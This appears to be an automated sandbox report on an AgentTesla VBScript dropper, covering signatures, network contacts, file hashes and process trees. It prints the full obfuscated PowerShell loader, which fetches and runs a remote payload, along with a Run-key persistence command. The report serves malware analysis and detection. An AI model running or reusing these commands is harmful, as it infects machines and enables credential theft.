Analysis Overview
SHA256
af46cfe7a8d2968846d0ae4ea5b3b36f91f37cf4195f781155e95c4e20696f85
Threat Level: Known bad
The file Doc09876545678.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 06:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 06:47
Reported
2024-06-03 06:49
Platform
win7-20240221-en
Max time kernel
144s
Max time network
149s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2916 set thread context of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drhhmarketing.com | udp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
Files
memory/2624-4-0x000007FEF573E000-0x000007FEF573F000-memory.dmp
memory/2624-5-0x000000001B560000-0x000000001B842000-memory.dmp
memory/2624-6-0x0000000001F70000-0x0000000001F78000-memory.dmp
memory/2624-10-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/2624-9-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/2624-8-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/2624-7-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab55D0.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar56EF.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c176f8310fd6f4f73514c6e25f82a8e1 |
| SHA1 | b5c9c9951317a1809c6be0aa2f9b3a8d8bd98a7d |
| SHA256 | 7c098e17959b49c5540d0bbad63d2757f1909d03cc93a3c2f6a9e1c26d1a3fca |
| SHA512 | 87f789001f5a8948b1c5cf9a0c58b86ea9a5045954d4671864f01f4e3475e2b65404856bebece3183a4e3f4688309b9c5fcb1b18df716d3311ec041b72667231 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BVTU59DVDGB45I7ZNNXF.temp
| MD5 | d6b2a25f22ff4b4b3b34af1dbe169069 |
| SHA1 | aef18d8eb963a2a9c145632dc66f948377ebd6df |
| SHA256 | f0000a576d7df2a890ea6a62dd1a38fea8e5f9fac7b49e2220c61304f14e1043 |
| SHA512 | 74e620c64864975ec1fbfd7f58b4fe28c0aa10f40037ea574eff155cf94558c1d755429df82660acc25d48d4f5da12bd9fa91f874df8daf7ee199421f2359665 |
C:\Users\Admin\AppData\Roaming\prefulgency.Sto
| MD5 | 4a4d70fe78c5f12946b4676950b00e8a |
| SHA1 | 1d7977005546ad74ee56f36552c7aaef6c8dae20 |
| SHA256 | 934c5a21da47652be278d09678d6fc16f3f3c4639bddd33c509d9b6bb024bf3f |
| SHA512 | 884f9bdd26b979f18c73280fc9270293e0b0c0a14094f8f47c74c8c08d8f033f9ff179269cc608f28097ed270c8491adf8510c512d7bcd8988c7d75e4e3c8def |
memory/2916-82-0x00000000066A0000-0x000000000B13E000-memory.dmp
memory/2624-83-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/2624-84-0x000007FEF573E000-0x000007FEF573F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 97cac688ae7032bfb0001f7096df0a78 |
| SHA1 | c0e9db883e0f7f2c1f7a689fa6d1a633a015e054 |
| SHA256 | 9a9408d277b2fbd85a236395b975b07b4d0e9233932bff35bad4e58886f62536 |
| SHA512 | 450f4818f70735bbd533aa35191e56c0060fb8ec7fe726f5589ca59639d0686ab846203f4292ec4fb8373c4f229a52f90ed97a9a5cab9bbdc7180c9b53274d1b |
memory/896-120-0x0000000000540000-0x00000000015A2000-memory.dmp
memory/2624-121-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/896-122-0x0000000000540000-0x0000000000580000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 06:47
Reported
2024-06-03 06:49
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
145s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3804 set thread context of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
